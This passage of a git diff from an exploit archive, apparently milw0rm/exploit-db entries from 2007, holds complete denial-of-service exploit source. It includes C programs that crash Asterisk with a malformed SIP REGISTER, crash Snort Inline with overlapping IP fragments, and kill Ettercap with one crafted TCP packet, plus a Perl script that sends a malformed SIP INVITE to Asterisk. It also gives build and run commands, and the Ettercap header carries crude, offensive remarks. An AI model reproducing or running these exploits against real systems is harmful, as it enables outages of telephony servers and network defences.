char *r_host = NULL; - struct udp_session *connection_out; - - - for (i=0;i option!\n"); - return 0; - } - - if (!(connection_out = (struct udp_session *)malloc(sizeof(struct udp_session)))) { - printf("malloc failed your computer sucks\n"); - return 0; - } - make_udp(connection_out, r_host, SIP_UDP_PORT); - kill_asterisk(connection_out); - free(connection_out); - return 0; -} - -// milw0rm.com [2007-03-04] +/* +this will cause asterisk to segfault, +the bug that this exploits has been patched in release 1.2.16 & 1.4.1 + +CLI> + +Program received signal SIGSEGV, Segmentation fault. +[Switching to Thread 1082719152 (LWP 2510)] +register_verify (p=0x81cf600, sin=0x4088e750, req=0x4088e760, uri=0x0) + at chan_sip.c:8257 +8257 while (*t && *t > ' ' && *t != ';') +(gdb) + + +build: +gcc -o asterisk-sip-killer asterisk-sip-killer.c + +run: +./asterisk-sip-killer -h + +*/ +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define SIP_UDP_PORT 5060 + +struct udp_session { + int sd; + struct sockaddr_in saddr; +}; + +int make_udp(struct udp_session *p, char *remotehost, int port) +{ + int sd; + int ret; + struct sockaddr_in saddr; + struct hostent *he; + + sd = socket(AF_INET,SOCK_DGRAM,0); + + if (sd == -1) { + printf("error making socket\n"); + return -1; + } + + he = gethostbyname(remotehost); + + saddr.sin_family = AF_INET; + saddr.sin_port = htons(port); + saddr.sin_addr.s_addr = inet_addr(remotehost); + memset(&(saddr.sin_zero), '\0', 8); + p->sd = sd; + memcpy(&p->saddr,&saddr,sizeof(struct sockaddr_in)); + + printf("udp socket ready\n"); + + return 0; +} + +void kill_asterisk(struct udp_session *sess) +{ + int ret; + char *p = + "REGISTER \r\n" + "Via: SIP/2.0/UDP 192.168.204.130:5060;branch=z9hG4bK1d97e14f\r\n" + "Max-Forwards: 70\r\n" + "From: ;tag=as253946cf\r\n" + "To: \r\n" + "Call-ID: 7e64a49e5cf018231228938050e43d3b@127.0.0.1\r\n" + "CSeq: 104 REGISTER\r\n" + "User-Agent: Asterisk PBX\r\n" + "Expires: 120\r\n" + 
"Contact: \r\n" + "Event: registration\r\n" + "Content-Length: 0\r\n"; + + ret = sendto(sess->sd, p, strlen(p), 0, + (struct sockaddr *)&sess->saddr, + sizeof(struct sockaddr)); + + if (ret) { + printf("You may have well shutdown a asterisk server\n"); + } else { + printf("there was a issue sending the request\n"); + return; + } + return; +} +int main(int argc, char **argv) +{ + int i = 0; + char *r_host = NULL; + struct udp_session *connection_out; + + + for (i=0;i option!\n"); + return 0; + } + + if (!(connection_out = (struct udp_session *)malloc(sizeof(struct udp_session)))) { + printf("malloc failed your computer sucks\n"); + return 0; + } + make_udp(connection_out, r_host, SIP_UDP_PORT); + kill_asterisk(connection_out); + free(connection_out); + return 0; +} + +// milw0rm.com [2007-03-04] diff --git a/platforms/multiple/dos/3434.c b/platforms/multiple/dos/3434.c index 6e8f3f0de..490a4d8bf 100755 --- a/platforms/multiple/dos/3434.c +++ b/platforms/multiple/dos/3434.c 
@@ -1,292 +1,292 @@ -/********************************************************* - * DOS Snort Inline - * Affected Versions: 2.6.1.1, 2.6.1.2, 2.7.0(beta) - * Requirements : Frag3 Enabled, Inline, Linux, ip_conntrack disabled - * Antimatt3r - * antimatter@gmail.com - * Offset needs to be supplied that would cause reassembly for different snort - * fragmentation reassembly policies. Since the first packet is hardcoded 70-74 offset - * will trigger the segfault. - ********************************************************/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -#define NOOP_FRAG_SLED 576 -#define NOOP_SHORT 16 - - -struct addr { - uint32_t ip; - char mac[ETH_ALEN]; -}; - -struct dev { - uint32_t index; - char name[IFNAMSIZ]; -}; - -int mac_aton(char *, char *); -void usage(char *cmd) { - fprintf(stderr, "usage: %s \n", cmd); -} - -int mac_aton(char *amac, char *nmac) { - char c; - int i; - unsigned int val; - - i = 0; - while ((*amac != '\0') && (i < ETH_ALEN)) { - val = 0; - c = *amac++; - if (c >= '0' && c <= '9') { - val = c - '0'; - } - else if (c >= 'a' && c <= 'f') { - val = c - 'a' + 10; - } - else if (c >= 'A' && c <= 'F') { - val = c - 'A' + 10; - } - else { - errno = EINVAL; - return -1; - } - val <<= 4; - - c = *amac; - if (c >= '0' && c <= '9') { - val |= c - '0'; - } - else if (c >= 'a' && c <= 'f') { - val |= c - 'a' + 10; - } - else if (c >= 'A' && c <= 'F') { - val |= c - 'A' + 10; - } - else if (c == ':' || c == '\0') { - val >>= 4; - } - else { - errno = EINVAL; - return -1; - } - if (c != 0) { - amac++; - } - *nmac++ = val & 0xff; - i++; - - /* We might get a semicolon here - not required. 
*/ - if (*amac == ':') { - amac++; - } - } - return 0; -} - - -int in_cksum(u_short *addr, int len) { -int nleft = len; -u_short *w = addr; -int sum = 0; -u_short answer = 0; - - while (nleft > 1) { - sum += *w++; - nleft -= 2; - } - - if (nleft == 1) { - *(u_char *)(&answer) = *(u_char *)w; - sum += answer; - } - - sum = (sum >> 16) + (sum & 0xffff); - sum += (sum >> 16); - answer = ~sum; - - return answer; -} - -int send_morefrag_packet(int sock, struct dev *dev, struct addr *src, struct -addr *dst) { - struct sockaddr_ll sll; - struct ether_header *eth; - struct iphdr *ip; - struct udphdr *udp; - u_char *payload; - char buf[sizeof(struct ether_header) + sizeof(struct iphdr) + sizeof(struct udphdr)+ NOOP_FRAG_SLED]; - - memset(&sll, 0, sizeof(sll)); - sll.sll_family = PF_PACKET; - sll.sll_ifindex = dev->index; - sll.sll_halen = ETH_ALEN; - memcpy(&sll.sll_addr, dst->mac, ETH_ALEN); - - memset(buf, 0, sizeof(buf)); - eth = (struct ether_header *)buf; - ip = (struct iphdr *)((char *)eth + sizeof(struct ether_header)); - udp = (struct udphdr *)((char *)ip + sizeof(struct iphdr)); - payload = (u_char *)((char *)udp + sizeof(struct udphdr)); - - memset(payload,'\x90',NOOP_FRAG_SLED); - - - udp->source = htons(1111); - udp->dest = htons(1111); - udp->len = htons(sizeof(struct udphdr) + NOOP_FRAG_SLED) ; - udp->check =0; - - - ip->version = 4; - ip->ihl = 5; - ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + NOOP_FRAG_SLED); - ip->id = 31337; - ip->ttl = 64; - ip->frag_off = htons(0x2000); - ip->protocol = IPPROTO_UDP; - ip->saddr = src->ip; - ip->daddr = dst->ip; - ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr)); - - memcpy(eth->ether_shost, src->mac, ETH_ALEN); - memcpy(eth->ether_dhost, dst->mac, ETH_ALEN); - eth->ether_type = htons(ETH_P_IP); - - if(sendto(sock, buf, sizeof(buf), 0, (struct sockaddr *)&sll, sizeof(sll)) == -1) - printf ("error %d %s\n",errno,strerror(errno)); - else - printf("MF Packet Sent\n"); -} - -int 
send_overlap_packet(int sock, struct dev *dev, struct addr *src, struct -addr *dst,int offset) { - struct sockaddr_ll sll; - struct ether_header *eth; - struct iphdr *ip; - struct udphdr *udp; - u_char *payload; - char buf[sizeof(struct ether_header) + sizeof(struct iphdr) + sizeof(struct udphdr)+ NOOP_SHORT ]; - - memset(&sll, 0, sizeof(sll)); - sll.sll_family = PF_PACKET; - sll.sll_ifindex = dev->index; - sll.sll_halen = ETH_ALEN; - memcpy(&sll.sll_addr, dst->mac, ETH_ALEN); - - memset(buf, 0, sizeof(buf)); - eth = (struct ether_header *)buf; - ip = (struct iphdr *)((char *)eth + sizeof(struct ether_header)); - udp = (struct udphdr *)((char *)ip + sizeof(struct iphdr)); - payload = (u_char *)((char *)udp + sizeof(struct udphdr)); - - memset(payload,'\x90',NOOP_SHORT); - - udp->source = htons(1111); - udp->dest = htons(1111); - udp->len = htons(sizeof(struct udphdr) + NOOP_SHORT) ; - udp->check =0; - - ip->version = 4; - ip->ihl = 5; - ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + NOOP_SHORT); - ip->id = 31337; - ip->frag_off = ntohs(offset); - ip->ttl = 64; - ip->protocol = IPPROTO_UDP; - ip->saddr = src->ip; - ip->daddr = dst->ip; - ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr)); - - memcpy(eth->ether_shost, src->mac, ETH_ALEN); - memcpy(eth->ether_dhost, dst->mac, ETH_ALEN); - eth->ether_type = htons(ETH_P_IP); - - if(sendto(sock, buf, sizeof(buf), 0, (struct sockaddr *)&sll, sizeof(sll)) == -1) - printf ("error %d %s\n",errno,strerror(errno)); - else - printf("2nd Packet Sent\n"); -} - - -int main(int argc, char *argv[]) { - int sock = 0; - struct dev dev; - struct addr src, dst; - int offset; //play with varying offsets - - if (argc < 7) { - usage(argv[0]); - return -1; - } - - memset(&dev, 0, sizeof(dev)); - strncpy(dev.name, argv[1], IFNAMSIZ-1); - if((dev.index = if_nametoindex(dev.name)) == 0) { - perror(argv[1]); - exit(-1); - } - - memset(&src, 0, sizeof(src)); - if (inet_aton(argv[2], (struct in_addr *)&src.ip) == 0) { - 
fprintf(stderr, "%s: invalid src ip address\n", argv[2]); - exit(-1); - } - - if (mac_aton(argv[3], src.mac) < 0) { - fprintf(stderr, "%s: invalid src hardware address\r\n", argv[3]); - exit(-1); - } - - memset(&dst, 0, sizeof(dst)); - if (inet_aton(argv[4], (struct in_addr *)&dst.ip) == 0) { - fprintf(stderr, "%s: invalid ip address\r\n", argv[2]); - exit(-1); - } - - if (mac_aton(argv[5], dst.mac) < 0) { - fprintf(stderr, "%s: invalid hardware address\r\n", argv[3]); - exit(-1); - } - - offset = atoi(argv[6]); - - if ((sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) { - perror("socket"); - exit(-1); - } - - if (send_morefrag_packet(sock, &dev, &src, &dst) < 0) { - perror("send error "); - exit(-1); - } - - if (send_overlap_packet(sock, &dev, &src, &dst,offset) < 0) { - perror("send error"); - exit(-1); - } - - close(sock); - - return 0; -} - -// milw0rm.com [2007-03-08] +/********************************************************* + * DOS Snort Inline + * Affected Versions: 2.6.1.1, 2.6.1.2, 2.7.0(beta) + * Requirements : Frag3 Enabled, Inline, Linux, ip_conntrack disabled + * Antimatt3r + * antimatter@gmail.com + * Offset needs to be supplied that would cause reassembly for different snort + * fragmentation reassembly policies. Since the first packet is hardcoded 70-74 offset + * will trigger the segfault. 
+ ********************************************************/ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +#define NOOP_FRAG_SLED 576 +#define NOOP_SHORT 16 + + +struct addr { + uint32_t ip; + char mac[ETH_ALEN]; +}; + +struct dev { + uint32_t index; + char name[IFNAMSIZ]; +}; + +int mac_aton(char *, char *); +void usage(char *cmd) { + fprintf(stderr, "usage: %s \n", cmd); +} + +int mac_aton(char *amac, char *nmac) { + char c; + int i; + unsigned int val; + + i = 0; + while ((*amac != '\0') && (i < ETH_ALEN)) { + val = 0; + c = *amac++; + if (c >= '0' && c <= '9') { + val = c - '0'; + } + else if (c >= 'a' && c <= 'f') { + val = c - 'a' + 10; + } + else if (c >= 'A' && c <= 'F') { + val = c - 'A' + 10; + } + else { + errno = EINVAL; + return -1; + } + val <<= 4; + + c = *amac; + if (c >= '0' && c <= '9') { + val |= c - '0'; + } + else if (c >= 'a' && c <= 'f') { + val |= c - 'a' + 10; + } + else if (c >= 'A' && c <= 'F') { + val |= c - 'A' + 10; + } + else if (c == ':' || c == '\0') { + val >>= 4; + } + else { + errno = EINVAL; + return -1; + } + if (c != 0) { + amac++; + } + *nmac++ = val & 0xff; + i++; + + /* We might get a semicolon here - not required. 
*/ + if (*amac == ':') { + amac++; + } + } + return 0; +} + + +int in_cksum(u_short *addr, int len) { +int nleft = len; +u_short *w = addr; +int sum = 0; +u_short answer = 0; + + while (nleft > 1) { + sum += *w++; + nleft -= 2; + } + + if (nleft == 1) { + *(u_char *)(&answer) = *(u_char *)w; + sum += answer; + } + + sum = (sum >> 16) + (sum & 0xffff); + sum += (sum >> 16); + answer = ~sum; + + return answer; +} + +int send_morefrag_packet(int sock, struct dev *dev, struct addr *src, struct +addr *dst) { + struct sockaddr_ll sll; + struct ether_header *eth; + struct iphdr *ip; + struct udphdr *udp; + u_char *payload; + char buf[sizeof(struct ether_header) + sizeof(struct iphdr) + sizeof(struct udphdr)+ NOOP_FRAG_SLED]; + + memset(&sll, 0, sizeof(sll)); + sll.sll_family = PF_PACKET; + sll.sll_ifindex = dev->index; + sll.sll_halen = ETH_ALEN; + memcpy(&sll.sll_addr, dst->mac, ETH_ALEN); + + memset(buf, 0, sizeof(buf)); + eth = (struct ether_header *)buf; + ip = (struct iphdr *)((char *)eth + sizeof(struct ether_header)); + udp = (struct udphdr *)((char *)ip + sizeof(struct iphdr)); + payload = (u_char *)((char *)udp + sizeof(struct udphdr)); + + memset(payload,'\x90',NOOP_FRAG_SLED); + + + udp->source = htons(1111); + udp->dest = htons(1111); + udp->len = htons(sizeof(struct udphdr) + NOOP_FRAG_SLED) ; + udp->check =0; + + + ip->version = 4; + ip->ihl = 5; + ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + NOOP_FRAG_SLED); + ip->id = 31337; + ip->ttl = 64; + ip->frag_off = htons(0x2000); + ip->protocol = IPPROTO_UDP; + ip->saddr = src->ip; + ip->daddr = dst->ip; + ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr)); + + memcpy(eth->ether_shost, src->mac, ETH_ALEN); + memcpy(eth->ether_dhost, dst->mac, ETH_ALEN); + eth->ether_type = htons(ETH_P_IP); + + if(sendto(sock, buf, sizeof(buf), 0, (struct sockaddr *)&sll, sizeof(sll)) == -1) + printf ("error %d %s\n",errno,strerror(errno)); + else + printf("MF Packet Sent\n"); +} + +int 
send_overlap_packet(int sock, struct dev *dev, struct addr *src, struct +addr *dst,int offset) { + struct sockaddr_ll sll; + struct ether_header *eth; + struct iphdr *ip; + struct udphdr *udp; + u_char *payload; + char buf[sizeof(struct ether_header) + sizeof(struct iphdr) + sizeof(struct udphdr)+ NOOP_SHORT ]; + + memset(&sll, 0, sizeof(sll)); + sll.sll_family = PF_PACKET; + sll.sll_ifindex = dev->index; + sll.sll_halen = ETH_ALEN; + memcpy(&sll.sll_addr, dst->mac, ETH_ALEN); + + memset(buf, 0, sizeof(buf)); + eth = (struct ether_header *)buf; + ip = (struct iphdr *)((char *)eth + sizeof(struct ether_header)); + udp = (struct udphdr *)((char *)ip + sizeof(struct iphdr)); + payload = (u_char *)((char *)udp + sizeof(struct udphdr)); + + memset(payload,'\x90',NOOP_SHORT); + + udp->source = htons(1111); + udp->dest = htons(1111); + udp->len = htons(sizeof(struct udphdr) + NOOP_SHORT) ; + udp->check =0; + + ip->version = 4; + ip->ihl = 5; + ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + NOOP_SHORT); + ip->id = 31337; + ip->frag_off = ntohs(offset); + ip->ttl = 64; + ip->protocol = IPPROTO_UDP; + ip->saddr = src->ip; + ip->daddr = dst->ip; + ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr)); + + memcpy(eth->ether_shost, src->mac, ETH_ALEN); + memcpy(eth->ether_dhost, dst->mac, ETH_ALEN); + eth->ether_type = htons(ETH_P_IP); + + if(sendto(sock, buf, sizeof(buf), 0, (struct sockaddr *)&sll, sizeof(sll)) == -1) + printf ("error %d %s\n",errno,strerror(errno)); + else + printf("2nd Packet Sent\n"); +} + + +int main(int argc, char *argv[]) { + int sock = 0; + struct dev dev; + struct addr src, dst; + int offset; //play with varying offsets + + if (argc < 7) { + usage(argv[0]); + return -1; + } + + memset(&dev, 0, sizeof(dev)); + strncpy(dev.name, argv[1], IFNAMSIZ-1); + if((dev.index = if_nametoindex(dev.name)) == 0) { + perror(argv[1]); + exit(-1); + } + + memset(&src, 0, sizeof(src)); + if (inet_aton(argv[2], (struct in_addr *)&src.ip) == 0) { + 
fprintf(stderr, "%s: invalid src ip address\n", argv[2]); + exit(-1); + } + + if (mac_aton(argv[3], src.mac) < 0) { + fprintf(stderr, "%s: invalid src hardware address\r\n", argv[3]); + exit(-1); + } + + memset(&dst, 0, sizeof(dst)); + if (inet_aton(argv[4], (struct in_addr *)&dst.ip) == 0) { + fprintf(stderr, "%s: invalid ip address\r\n", argv[2]); + exit(-1); + } + + if (mac_aton(argv[5], dst.mac) < 0) { + fprintf(stderr, "%s: invalid hardware address\r\n", argv[3]); + exit(-1); + } + + offset = atoi(argv[6]); + + if ((sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) { + perror("socket"); + exit(-1); + } + + if (send_morefrag_packet(sock, &dev, &src, &dst) < 0) { + perror("send error "); + exit(-1); + } + + if (send_overlap_packet(sock, &dev, &src, &dst,offset) < 0) { + perror("send error"); + exit(-1); + } + + close(sock); + + return 0; +} + +// milw0rm.com [2007-03-08] diff --git a/platforms/multiple/dos/3566.pl b/platforms/multiple/dos/3566.pl index a3fd88010..bb9847f02 100755 --- a/platforms/multiple/dos/3566.pl +++ b/platforms/multiple/dos/3566.pl 
@@ -1,21 +1,21 @@ -#!/usr/bin/perl -# perl asterisk-Invite.pl 192.168.1.104 5060 userX 192.168.1.2 5060 userY - -use IO::Socket::INET; - -die "Usage $0 " unless ($ARGV[5]); - - - -$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], - - Proto=>'udp', - - PeerAddr=>$ARGV[0]); - - -$msg="INVITE sip:$ARGV[2]\@$ARGV[0]:$ARGV[1] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3]:$ARGV[4];branch=01;rport\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nContent-Type: application/sdp\r\nCSeq: 01 INVITE\r\nContent-Length: 187\r\n\r\nv=0\r\no=root 25903 25903 IN IP4 $ARGV[3]\r\ns=session\r\nc=IN IP4 $ARGV[3]\r\nc=IN IP4 910.188.8.2\r\nt=0 0\r\nm=audio 13956 RTP/AVP 0 4 3 8 111 5 10 7 18 110 97 101\r\na=rtpmap:98 speex/16000\r\n\r\n"; - -$socket->send($msg); - -# milw0rm.com [2007-03-25] +#!/usr/bin/perl +# perl asterisk-Invite.pl 192.168.1.104 5060 userX 192.168.1.2 5060 userY + +use IO::Socket::INET; + +die "Usage $0 " unless ($ARGV[5]); + + + +$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], + + Proto=>'udp', + + PeerAddr=>$ARGV[0]); + + +$msg="INVITE sip:$ARGV[2]\@$ARGV[0]:$ARGV[1] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3]:$ARGV[4];branch=01;rport\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nContent-Type: application/sdp\r\nCSeq: 01 INVITE\r\nContent-Length: 187\r\n\r\nv=0\r\no=root 25903 25903 IN IP4 $ARGV[3]\r\ns=session\r\nc=IN IP4 $ARGV[3]\r\nc=IN IP4 910.188.8.2\r\nt=0 0\r\nm=audio 13956 RTP/AVP 0 4 3 8 111 5 10 7 18 110 97 101\r\na=rtpmap:98 speex/16000\r\n\r\n"; + +$socket->send($msg); + +# milw0rm.com [2007-03-25] diff --git a/platforms/multiple/dos/3709.html b/platforms/multiple/dos/3709.html index 9df63064c..07cdb6a4c 100755 --- a/platforms/multiple/dos/3709.html +++ b/platforms/multiple/dos/3709.html @@ -1,19 +1,19 @@ - - - - - - - - - - - - -# milw0rm.com [2007-04-11] + + + + + + + + + + + + +# milw0rm.com [2007-04-11] diff --git a/platforms/multiple/dos/3726.c b/platforms/multiple/dos/3726.c index 7ba279b3d..c8e892ab9 100755 --- a/platforms/multiple/dos/3726.c 
+++ b/platforms/multiple/dos/3726.c 
@@ -1,190 +1,190 @@ -/* - WARNING WARNING WARNING - - THIS PACKAGE CONTAINS AN 0DAY. - NO ONE CAN BE HELD RESPONSIBLE IF THIS CODE RAPES YOUR SISTER OR MOLESTS YOUR DOG. - - WARNING WARNING WARNING - - - THE ONE PACKET ETTERCAP KILLER NOW IN A SMALLER PACKAGE! - - If you want to know how this works then figure it out yourself. - Tested with Ettercap-NG v 0.7.3 on FreeBSD 6.1 and Slackware 10.1 - - greetz go out to tip, milkmang, chrak, jcb, rest of b4b0, mosthated, xtaylor, and rest of global hell,riot, JxT, - p00kie_p0x, tadp0le, #oldskewl, #ubergeeks, #wp, le_kickban for fucking french women and anyone else I forgot.. - - REMEBER KIDS EVILRABBI LOVES YOU :*. - - gcc -Wall -o b4b0-ettercap b4b0-ettercap.c - ./b4b0-ettercap - -*/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define IP struct iphdr -#define TCP struct tcphdr - -void usage(); -unsigned short ipChecksum(unsigned short *ptr, int nbytes); - -void usage() -{ -int i; -for (i=0; i < 100; i++) { printf("\n");} - - printf(" VVVVVVVVVVV VVVVVVVVVVV\n"); - printf(" VVVVV[ T34M B4B0 PROUDLY PRESENTS: ]VVVV\n"); - printf(" VVVVVVVVVV VVVVVVV\n"); - printf(" VVVVVVVVV b4b0-ettercap.c VVVVVVV\n"); - printf(" . $&y VVVVVVVVVV ,p& y&$ VVVVVVVVVV,a8888a,\n"); - printf(" $$' VVVVVVVVVV,d$$$ $$' VVVVV .s$',8P\"' `\"Y8, . \n"); - printf(" yxxx.$$.xxxxxxxxxxxx ,d$\"`$$.x.$$.xxxxxxxx.,8P.xxxx.s`$$,.xxxg \n"); - printf(" $ P' $$,d$$Yba, ,d$\" d $$ $$,d$$Yba, 88 ,$.$$$ $ \n"); - printf(" $ ' $$P' ,`$$a ,d$\" ``\" $$ , $$$P' ,`Y$a 88 ,s$,$$$ . $ \n"); - printf(" $ $$k g Y$$ $$$$$$$$$$$$$ $$f d d$$ `8b ,$$'d$$' ,d $ \n"); - printf(" bxxx.$$$, '`,d$\".xxxxxxxx.$$.x.$$b, ',a$$\".x`8ba,,aad$$'.xxxxd. . 
\n"); - printf(" s$Y\"Y$bd$P',yas.VVVV s$$z $Y\"Y$$$P\"' \"Y$$$$(headflux)$ \n"); - printf(" VVVVVVVV VVVVVVVV \n"); - printf(" VVVVVVVV VVVVVVVV \n"); - printf(" ettercap-ng v0.7.3 VVVVVVVV VVVVVVVV \n"); - printf(" Denial of Service VVVVVVVVVVVVVVVV \n"); - printf(" by EvilRabbi VVVVVVVVVVVVVV \n"); - printf(" VVVVVV \n"); - printf(" VVVV \n"); - printf(" VV \n"); -} -unsigned short ipChecksum(unsigned short *ptr, int nbytes) -{ - register long sum; - register u_short answer; - u_short oddbyte; - - sum = 0; - - while (nbytes > 1) { - sum += *ptr++; - nbytes -= 2; - } - - if (nbytes == 1) { - oddbyte = 0; - *((u_char *) & oddbyte) = *(u_char *) ptr; - sum += oddbyte; - } - - sum = (sum >> 16) + (sum & 0xffff); - sum += (sum >> 16); - answer = ~sum; -return (answer); -} - -int main(int argc, char **argv) -{ - int sockfd, opt = 1; - char tcpoptions[4]; - char dest[20]; - unsigned int pLen,sIPLen; - unsigned char pkt[(pLen = sizeof(IP) + sizeof(TCP) + 4)]; - unsigned char ip[(sIPLen = 12 + sizeof(TCP) + 4)]; - struct hostent *he; - struct sockaddr_in host; - struct sockaddr_in s; - - struct in_addr etter; - IP *iphdr = (IP *)pkt; - TCP *tcphdr = (TCP *)((unsigned char *)pkt + sizeof(IP)); - - if (getuid() != 0) { - printf("you need to be r00t =(\n"); - exit(0); - } - - if (argc != 2) { - usage(); - exit(0); - } - if ((he=gethostbyname(argv[1])) == NULL) { // get the host info - herror("gethostbyname"); - exit(1); - } - snprintf (dest,sizeof(dest)-1,"%d.%d.%d.%d\n", (unsigned char)he->h_addr_list[0][0], - (unsigned char)he->h_addr_list[0][1], - (unsigned char)he->h_addr_list[0][2], - (unsigned char)he->h_addr_list[0][3]); - - if ((sockfd = socket(AF_INET,SOCK_RAW,IPPROTO_TCP)) == -1) { - perror("socket"); - exit(1); - } - setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&opt,sizeof(opt)); - - etter.s_addr = inet_addr(dest); - s.sin_addr.s_addr = INADDR_ANY; - //etter.s_addr = inet_addr("69.46.19.77"); - memset(tcpoptions,0,sizeof(tcpoptions)); - tcpoptions[0]=0x08; - 
tcpoptions[1]=0x00; - tcpoptions[2]=0x00; - tcpoptions[3]=0x00; - - memset(&host, 0, sizeof(host)); - memset(pkt, 0, pLen); - memcpy(pkt+sizeof(IP)+sizeof(TCP), tcpoptions, sizeof(tcpoptions)); - memset(ip, 0, sIPLen); - *((unsigned long *)((unsigned char *)ip+0)) = s.sin_addr.s_addr; - *((unsigned long *)((unsigned char *)ip+4)) = etter.s_addr; - *((unsigned char *)((unsigned char *)ip+8)) = 0; - *((unsigned char *)((unsigned char *)ip+9)) = IPPROTO_TCP; - *((unsigned short *)((unsigned char *)ip+10)) = htons(pLen - sizeof(IP)); - iphdr->version = 4; - iphdr->ihl = 5; - iphdr->id = rand() & 0xFFFF; - iphdr->id = iphdr->id + 1; - iphdr->saddr = s.sin_addr.s_addr; - iphdr->daddr = etter.s_addr; - iphdr->protocol = IPPROTO_TCP; - iphdr->ttl = 255; - iphdr->tot_len = pLen; - iphdr->check = ipChecksum((u_short *)iphdr, sizeof(IP)); - - host.sin_family = AF_INET; - host.sin_addr.s_addr = etter.s_addr; - - tcphdr->source = htons(8); - tcphdr->dest = htons(1); - tcphdr->seq = htonl(rand()); - tcphdr->ack_seq = htonl(rand()); - tcphdr->doff = ((sizeof(TCP)+4) / 4); - tcphdr->check=0; - tcphdr->fin = 0; - tcphdr->syn = 1; - tcphdr->rst = 0; - tcphdr->psh = 0; - tcphdr->ack = 0; - tcphdr->urg = 0; - tcphdr->window = htons(5840); - memcpy(ip+12, ((unsigned char *)pkt)+sizeof(IP), pLen - sizeof(IP)); - tcphdr->check = ipChecksum((u_short *)&ip, sIPLen); - - sendto(sockfd, pkt, pLen, 0, (struct sockaddr *)&host, sizeof(host)); - - return 0; -} - -// milw0rm.com [2007-04-13] +/* + WARNING WARNING WARNING + + THIS PACKAGE CONTAINS AN 0DAY. + NO ONE CAN BE HELD RESPONSIBLE IF THIS CODE RAPES YOUR SISTER OR MOLESTS YOUR DOG. + + WARNING WARNING WARNING + + + THE ONE PACKET ETTERCAP KILLER NOW IN A SMALLER PACKAGE! + + If you want to know how this works then figure it out yourself. 
+ Tested with Ettercap-NG v 0.7.3 on FreeBSD 6.1 and Slackware 10.1 + + greetz go out to tip, milkmang, chrak, jcb, rest of b4b0, mosthated, xtaylor, and rest of global hell,riot, JxT, + p00kie_p0x, tadp0le, #oldskewl, #ubergeeks, #wp, le_kickban for fucking french women and anyone else I forgot.. + + REMEBER KIDS EVILRABBI LOVES YOU :*. + + gcc -Wall -o b4b0-ettercap b4b0-ettercap.c + ./b4b0-ettercap + +*/ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define IP struct iphdr +#define TCP struct tcphdr + +void usage(); +unsigned short ipChecksum(unsigned short *ptr, int nbytes); + +void usage() +{ +int i; +for (i=0; i < 100; i++) { printf("\n");} + + printf(" VVVVVVVVVVV VVVVVVVVVVV\n"); + printf(" VVVVV[ T34M B4B0 PROUDLY PRESENTS: ]VVVV\n"); + printf(" VVVVVVVVVV VVVVVVV\n"); + printf(" VVVVVVVVV b4b0-ettercap.c VVVVVVV\n"); + printf(" . $&y VVVVVVVVVV ,p& y&$ VVVVVVVVVV,a8888a,\n"); + printf(" $$' VVVVVVVVVV,d$$$ $$' VVVVV .s$',8P\"' `\"Y8, . \n"); + printf(" yxxx.$$.xxxxxxxxxxxx ,d$\"`$$.x.$$.xxxxxxxx.,8P.xxxx.s`$$,.xxxg \n"); + printf(" $ P' $$,d$$Yba, ,d$\" d $$ $$,d$$Yba, 88 ,$.$$$ $ \n"); + printf(" $ ' $$P' ,`$$a ,d$\" ``\" $$ , $$$P' ,`Y$a 88 ,s$,$$$ . $ \n"); + printf(" $ $$k g Y$$ $$$$$$$$$$$$$ $$f d d$$ `8b ,$$'d$$' ,d $ \n"); + printf(" bxxx.$$$, '`,d$\".xxxxxxxx.$$.x.$$b, ',a$$\".x`8ba,,aad$$'.xxxxd. . 
\n"); + printf(" s$Y\"Y$bd$P',yas.VVVV s$$z $Y\"Y$$$P\"' \"Y$$$$(headflux)$ \n"); + printf(" VVVVVVVV VVVVVVVV \n"); + printf(" VVVVVVVV VVVVVVVV \n"); + printf(" ettercap-ng v0.7.3 VVVVVVVV VVVVVVVV \n"); + printf(" Denial of Service VVVVVVVVVVVVVVVV \n"); + printf(" by EvilRabbi VVVVVVVVVVVVVV \n"); + printf(" VVVVVV \n"); + printf(" VVVV \n"); + printf(" VV \n"); +} +unsigned short ipChecksum(unsigned short *ptr, int nbytes) +{ + register long sum; + register u_short answer; + u_short oddbyte; + + sum = 0; + + while (nbytes > 1) { + sum += *ptr++; + nbytes -= 2; + } + + if (nbytes == 1) { + oddbyte = 0; + *((u_char *) & oddbyte) = *(u_char *) ptr; + sum += oddbyte; + } + + sum = (sum >> 16) + (sum & 0xffff); + sum += (sum >> 16); + answer = ~sum; +return (answer); +} + +int main(int argc, char **argv) +{ + int sockfd, opt = 1; + char tcpoptions[4]; + char dest[20]; + unsigned int pLen,sIPLen; + unsigned char pkt[(pLen = sizeof(IP) + sizeof(TCP) + 4)]; + unsigned char ip[(sIPLen = 12 + sizeof(TCP) + 4)]; + struct hostent *he; + struct sockaddr_in host; + struct sockaddr_in s; + + struct in_addr etter; + IP *iphdr = (IP *)pkt; + TCP *tcphdr = (TCP *)((unsigned char *)pkt + sizeof(IP)); + + if (getuid() != 0) { + printf("you need to be r00t =(\n"); + exit(0); + } + + if (argc != 2) { + usage(); + exit(0); + } + if ((he=gethostbyname(argv[1])) == NULL) { // get the host info + herror("gethostbyname"); + exit(1); + } + snprintf 